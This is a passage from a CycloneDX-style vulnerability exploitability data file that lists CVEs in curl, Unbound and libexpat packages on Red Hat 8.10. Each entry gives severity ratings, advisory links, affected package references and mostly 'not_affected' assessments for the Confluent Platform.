          "url": "https://access.redhat.com/security/cve/CVE-2026-4873"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-4873.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-4873.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-5fgw-rv54-prjx"
        },
        {
          "url": "https://hackerone.com/reports/3621851"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4873"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8227-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4873"
        }
      ],
      "published": "2026-05-13T13:01:55+00:00",
      "updated": "2026-06-17T10:57:22+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-50046",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        416
      ],
      "description": "In NLnet Labs Unbound 1.15.0 up to and including 1.25.1, the TLS server name used for DNS-over-TLS (DoT) forwarded queries is tied to a struct's ('serviced_query') lifetime but also referenced by another struct ('waiting_tcp'). When the owning struct is jostled out of the mesh while the DoT TCP stream is still handshaking it frees the storage behind the referenced string and if the TLS stream then errors out, it dereferences the freed pointer. The dereference is read-only and the practical impact is a daemon crash resulting in denial of service. A malicious actor that knows a DoT forwarding/stub Unbound's configuration could exploit the vulnerability by quering records in the appropriate zone while keeping Unbound uder pressure so that the jostle logic kicks in. If answers for the vulnerable zone are slow, the likelihood of jostling such queries is higher, although the timing of the jostle needs to be precise. Requirements for a vulnerable Unbound is the existence of a stub/forward zone configured for DoT together with a configured '#authname' suffix on the server identification. The connectivity to the server needs to exhibit a transient failure at the correct time in order to kick off the vulnerable error path.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-50046"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-50046"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-50046"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-50046"
        },
        {
          "url": "https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-50046.txt"
        }
      ],
      "published": "2026-07-22T14:17:20+00:00",
      "updated": "2026-07-24T13:55:29+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-50219",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L"
        }
      ],
      "cwes": [
        416
      ],
      "description": "libexpat before 2.8.2 lacks handler call depth tracking for calls to XML_GetBuffer, XML_Parse, XML_ParseBuffer, XML_ParserFree, or XML_ParserReset from within handlers in cases of a policy violation. Thus, a use-after-free can occur,",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-50219"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-50219"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1246"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-50219"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-50219"
        }
      ],
      "published": "2026-06-04T06:16:25+00:00",
      "updated": "2026-07-22T20:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.5.0-2.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-50251",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        184
      ],
      "description": "In NLnet Labs Unbound up to and including version 1.25.1, when 'unwanted-reply-threshold' is enabled (set to any value greater than zero), glue records of 0.0.0.0/::0 can short-circuit Unbound, on systems that can direct such traffic, by issuing DNS queries and receiving seemingly unwanted replies since the remote IP does not match the original source IP of 0.0.0.0/::0. This behavior keeps on looping for the glue records and pushing the counter to the configured 'unwanted-reply-threshold' that triggers a defensive cache clear. A malicious actor who controls a delegation that returns in-bailiwick glue of 0.0.0.0/::0 can drive the counter to the limit of 'unwanted-reply-threshold' to the threshold and trigger a cache clean of the message and rrset caches; at will, indefinitely, without sending a single spoofed packet. The iterator uses the 0.0.0.0/::0 glue, and a system that can route this (e.g., Linux kernel routes the datagram over loopback), Unbound's own listener answers from 127.0.0.1. Because of the mismatch of 0.0.0.0 and 127.0.0.1, in this example, Unbound accounts the reply as an unwanted (probably spoofed) answer. The counter resets to zero on every cache flush, so the attack loops forever.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-50251"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-50251"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-50251"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-50251"
        },
        {
          "url": "https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-50251.txt"
        }
      ],
      "published": "2026-07-22T14:17:20+00:00",
      "updated": "2026-07-24T14:05:26+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
